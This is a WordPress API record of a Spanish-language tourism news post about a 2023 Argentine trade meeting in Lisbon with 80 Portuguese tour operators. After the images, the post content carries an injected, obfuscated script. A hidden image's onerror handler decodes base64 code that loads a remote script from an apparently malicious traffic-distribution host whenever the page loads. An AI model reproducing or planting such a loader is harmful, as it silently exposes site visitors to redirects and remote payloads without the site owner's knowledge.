{"id":6248,"date":"2023-01-25T21:26:20","date_gmt":"2023-01-26T00:26:20","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6248"},"modified":"2025-08-13T16:06:57","modified_gmt":"2025-08-13T19:06:57","slug":"exitoso-encuentro-comercial-en-portugal-80-empresarios-locales-presentes","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6248","title":{"rendered":"Exitoso encuentro comercial en Portugal: 80 empresarios locales presentes"},"content":{"rendered":"\n<p>El\u00a0<strong>Instituto Nacional de Promoci\u00f3n Tur\u00edstica realiz\u00f3 un importante encuentro comercial en Lisboa, Portugal,<\/strong>\u00a0que cont\u00f3 con la presencia de\u00a0<strong>80 tour operadores portugueses<\/strong>, quienes fueron capacitados sobre las novedades y destinos tur\u00edsticos de Argentina. Adem\u00e1s, realizaron networking con los\u00a0<strong>27 empresarios argentinos<\/strong>\u00a0y los ocho destinos argentinos que tambi\u00e9n formaron parte de la delegaci\u00f3n, la cual estuvo encabezada por el\u00a0<strong>Secretario Ejecutivo del INPROTUR, Ricardo Sosa<\/strong>. Tambi\u00e9n estuvieron presentes el\u00a0<strong>Embajador argentino en Portugal, Rodolfo Gil,<\/strong>\u00a0el Vicepresidente de la Federaci\u00f3n Argentina de Agencias,\u00a0<strong>Ezequiel Barber\u00eds<\/strong>\u00a0y el Secretario de Relaciones Instituciones de C\u00e1mara Argentina de Turismo,\u00a0<strong>Horacio Reppucci.<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci6.googleusercontent.com\/proxy\/vYki2KgRncUl8msWB98KLCQJzuHSvMcUvLBSbrAO9RBPXgoLbT-NCxHIQxcRaWJ2bdz052aL_0W-VXL5b4hNczGC1RemmElr7v4w5iHQnhIy0xn7teB1cvjf1wDfT61ihLlSMhp8KCquuCsQ1pXZl_fBmSRFw3U=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/deb389c5-6092-2212-d6f9-883941b2eee9.jpeg\" alt=\"\" \/><\/figure>\n\n\n\n<p>Sosa expres\u00f3 sobre el evento: \u201c<em>Tuvimos una gran convocatoria y es importante para continuar con el proceso de recuperaci\u00f3n del turismo receptivo, en este caso, proveniente desde Portugal. Que hayan estado presentes 27 empresas y 8 destinos de Argentina, muestra el trabajo mancomunado que estamos realizando para que esto suceda<\/em>\u201d. Adem\u00e1s, agreg\u00f3: \u201cE<em>n los \u00faltimos tres meses tuvimos una recuperaci\u00f3n de casi el 60% del turismo proveniente de Portugal en comparaci\u00f3n a los n\u00fameros del 2019, por lo que esperamos y trabajamos para que esos n\u00fameros vayan en aumento durante los pr\u00f3ximos meses y alcanzar la recuperaci\u00f3n total a mediados de 2023<\/em>\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci3.googleusercontent.com\/proxy\/5HF2qLoUcsQrYW8kR9yYYnafGOBybh1YaBuFD7yap9sU304dG55_r81rrRh4HZdH0tqwh96jzV4RkgRdBUwr5FNDq5Iz9vTkqvROTHlCu3h-ohS_WQEY-PMi_yCNZznfjEduGP2LAbzsI9Vcr5dAxo8QooOA_ec=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/9e414b10-43bd-502a-d376-bb52203d58b8.jpeg\" alt=\"\" \/><\/figure>\n\n\n\n<p>Los destinos presentes en la comitiva fueron\u00a0<strong>Tierra del Fuego, Santa Cruz, Neuqu\u00e9n, Chubut, R\u00edo Negro, Salta, Jujuy y Bariloche<\/strong>. Los empresarios portugueses invitados pudieron finalizar la jornada con una degustaci\u00f3n de vino y comida t\u00edpica argentina para conocer m\u00e1s sobre las bondades gastron\u00f3micas de nuestro pa\u00eds y algunos fueron premiados tras unos sorteos otorgados por las empresas presentes.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci5.googleusercontent.com\/proxy\/iE2nktctkjyeziclIg635FNP_MMLqWML3dP2THVKESAodw-WWItAamZXMQAraC-HJTTEecyJk6r_NSCdElS_fF8YoLSNdjTy23zuFpA9bHq8n2IUYxmTM72R0d2uq2w2xqOVNyL5059wVXAROGxixFfbuxa_3w=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/0d68b8f6-d031-5d00-bcbb-4bdef1b14684.png\" alt=\"\" \/><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El\u00a0Instituto Nacional de Promoci\u00f3n Tur\u00edstica realiz\u00f3 un importante encuentro comercial en Lisboa, Portugal,\u00a0que cont\u00f3 con la presencia de\u00a080 tour operadores portugueses, quienes fueron capacitados sobre las novedades y destinos tur\u00edsticos de Argentina. Adem\u00e1s, realizaron networking con los\u00a027 empresarios argentinos\u00a0y los ocho destinos argentinos que tambi\u00e9n formaron parte de la delegaci\u00f3n, la cual estuvo encabezada por [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6249,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-6248","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6248"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6248\/revisions"}],"predecessor-version":[{"id":10497,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6248\/revisions\/10497"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6249"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6248"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}